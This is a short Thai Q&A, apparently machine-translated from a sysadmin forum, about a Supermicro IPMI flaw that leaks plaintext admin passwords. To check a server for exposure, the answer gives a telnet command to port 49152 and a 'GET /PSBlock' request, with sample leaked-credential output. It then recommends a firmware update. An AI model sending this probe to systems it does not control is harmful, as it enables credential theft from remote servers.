ฉันเซิร์ฟเวอร์ Supermicro บางคนที่มี IPMI ทำงานและที่อธิบายไว้ในบล็อกนี้ ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) มีช่องโหว่ที่สำคัญในการ รับรหัสผ่านผู้ดูแลระบบธรรมดาจากที่ตั้งระยะไกลใด ๆ
จะตรวจสอบได้อย่างไรว่าเมนบอร์ดเซิร์ฟเวอร์ของฉันถูกบุกรุกหรือไม่?
คำตอบ:
เพียงเทลเน็ตไปยังที่อยู่ IPMI IP ในพอร์ต 49152 และทำการร้องขอ GET เฉพาะ คุณควรให้ผู้ใช้และรหัสผ่านของคุณถ้าคุณถูกบุกรุก
telnet server.example.com 49152
หลังจากการเชื่อมต่อขอGET /PSBlockและดูผลลัพธ์มันควรเป็นดังนี้:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
ตอบ:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
เพื่อแก้ไขปัญหานี้ให้อัปเดตเฟิร์มแวร์ IPMI เป็นเวอร์ชั่นล่าสุด เฟิร์มแวร์นี้เป็นอุปกรณ์เฉพาะสำหรับคอนโทรลเลอร์ IPMI ของคุณดังนั้นคุณควรรับข้อมูลที่ระบุในเว็บไซต์ของซูเปอร์ไมโคร
แล้วหลังจากการอัปเดตเฟิร์มแวเปลี่ยนแปลงรหัสผ่านของคุณ